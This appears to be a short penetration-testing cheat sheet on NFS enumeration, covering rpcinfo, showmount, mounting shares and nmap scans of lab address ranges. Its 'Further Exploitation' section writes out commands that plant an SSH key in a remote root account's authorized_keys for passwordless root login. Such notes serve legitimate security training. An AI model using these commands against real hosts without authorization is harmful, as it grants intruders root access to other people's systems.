NFS Enumeration (Port 111, 2049)

Quick Intro

• Developed in 1984 by Sun Microsystem and similar to SMB because it allows access to files over a network.

• Common ports used by NFS are port 111 and 2049 tcp/udp

• It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory.

Identifying if NFS is in use

rpcinfo -p <ip>

# If you get 111 and 2049 listed , shares are enable and we can mount them

Show all mounts

• if nfs is available, use showmount to view available mounting points

showmount -e $ip

Mount a NFS share

• you can then mount the file system with the mount command and interact with remote system

• first create the directory for mounting -

  mkdir /mnt/nfs

mount -t nfs $ip:/share /mnt/nfs

Unmounting the shares

umount -f -l /mnt/nfs
# -f – Force unmount (in case of an unreachable NFS system). (Requires kernel 2.1.116 or later.)
# -l – Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore. (Requires kernel 2.4.11 or later.)

Permission Denied ?

[Write-up] Vulnix - playing around with NFS - Christophe Tafani-DereeperChristophe Tafani-Dereeper

Further Exploitation

• If you can write to the remote hosts, try to put ssh key there so that we can get remote ssh without password ,

ssh keygen
# Generating ssh keys

cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys
# Putting it to remote host

ssh root@$ip
# Now can login without password on target

Nmap Scan on RPCbind and NFS

nmap -v -p 111 10.11.1.1-254

nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254

nmap -p 111 --script nfs* 10.11.1.72